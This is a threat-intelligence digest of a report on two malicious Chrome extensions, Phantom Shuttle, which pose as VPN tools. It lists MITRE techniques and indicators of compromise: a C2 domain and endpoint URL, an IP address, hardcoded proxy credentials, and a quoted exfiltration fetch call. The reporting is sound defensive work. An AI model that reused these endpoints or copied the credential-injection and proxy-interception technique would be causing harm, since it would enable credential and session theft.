Socket’s Threat Research Team discovered two malicious Chrome extensions named Phantom Shuttle (幻影穿梭) that pose as paid multi-location network speed test/VPN tools while injecting hardcoded proxy credentials and routing targeted traffic through attacker-controlled proxies. The extensions perform continuous credential exfiltration and man-in-the-middle data capture via a 60-second heartbeat and proxy infrastructure at phantomshuttle.space using the credentials topfany/963852wei. #PhantomShuttle #phantomshuttle.space
Keypoints
- Two Chrome extensions named Phantom Shuttle (幻影穿梭) distributed since at least 2017 by the same actor (registration email theknewone.com@gmail[.]com) are marketed as paid VPN/proxy tools and have over 2,180 users.
- Both extensions prepend malicious code to legitimate jquery-1.12.2.min.js and scripts.js to decode and inject hardcoded proxy credentials (topfany / 963852wei) into all HTTP authentication challenges via chrome.webRequest.onAuthRequired.
- The extensions configure Chrome proxy settings with a PAC script and a “smarty” mode that routes traffic for 170+ high-value domains (developer, cloud, corporate, social, and adult sites) through attacker-controlled proxies, enabling MITM interception.
- A persistent heartbeat and VIP status checks transmit user email and plaintext passwords to a C2 at phantomshuttle[.]space (heartbeat every 60s, data sent every 5 minutes), and the extension responds to remote commands to enable/disable proxy modes.
- Data exfiltration channels include initial configuration fetches, heartbeat API calls, and continuous proxy traffic capture (credentials, session cookies, POST data, API keys, payment data), with persistent storage in chrome.storage.local.
- Infrastructure analysis shows the C2 domain phantomshuttle[.]space (registered 2017) resolving to 47[.]244[.]125[.]55 on Alibaba Cloud, using Cloudflare and active API endpoints; takedown requests have been submitted to Google.
MITRE Techniques
- [T1176 ] Browser Extensions – Used as the delivery and execution vehicle for malicious code and persistent functionality within the browser. (‘”Ready to use, simple setup, a simulated multi-location network speed testing plugin for developers and foreign trade personnel.”‘)
- [T1557 ] Adversary-in-the-Middle – Achieves a man-in-the-middle position by routing targeted domain traffic through attacker-controlled proxies authenticated with injected credentials. (‘”operate as man-in-the-middle proxies”‘)
- [T1090.002 ] Proxy: External Proxy – Configures PAC scripts and proxy settings to route traffic for 170+ targeted domains through external proxies controlled by the threat actor. (‘”route traffic from 170+ targeted domains through the C2 infrastructure.”‘)
- [T1539 ] Steal Web Session Cookie – Extracts session cookies from HTTP headers when traffic is proxied, enabling session hijacking and account takeover. (‘”Session cookie theft from HTTP headers”‘)
- [T1056.003 ] Input Capture: Web Portal Capture – Captures form inputs and credentials submitted to proxied sites (passwords, credit card numbers, form data). (‘”All passwords typed into login forms”‘)
- [T1027 ] Obfuscated Files or Information – Hides hardcoded credentials and endpoints using a custom character-index encoding and the jerry() decoding function to evade simple static analysis. (‘”This obfuscates the credentials topfany / 963852wei from basic static analysis.”‘)
- [T1071.001 ] Application Layer Protocol: Web Protocols – Uses HTTP(S) fetch calls for configuration, heartbeat, and command-and-control communications to exfiltrate data and receive instructions. (‘fetch(decodedApiUrl, { method: “GET”, body: JSON.stringify(payload) })’)
- [T1573 ] Encrypted Channel – Uses HTTPS with valid SSL certificates on port 443 for C2 communications to present a legitimate appearance and protect transport. (‘”The server responds to HTTPS requests on port 443 with valid SSL certificates”‘)
Indicators of Compromise
- [Chrome Extension Name / ID ] Malicious extension identifiers – Phantom Shuttle (幻影穿梭) – fbfldogmkadejddihifklefknmikncaj, ocpcmfmiidofonkbodpdhgddhlcmcofd
- [Version ] Extension version observed – 3.1.9
- [Registration Email ] Threat actor contact – theknewone.com@gmail[.]com
- [Domain ] C2 domain and API endpoints – phantomshuttle[.]space, https://phantomshuttle[.]space/index[.]php?g=user&m=register&a=do_query_server
- [IP Address ] Hosting infrastructure – 47[.]244[.]125[.]55 (Alibaba Cloud, Hong Kong)
- [Credentials ] Hardcoded proxy credentials used for authentication – topfany / 963852wei
Read more: https://socket.dev/blog/malicious-chrome-extensions-phantom-shuttle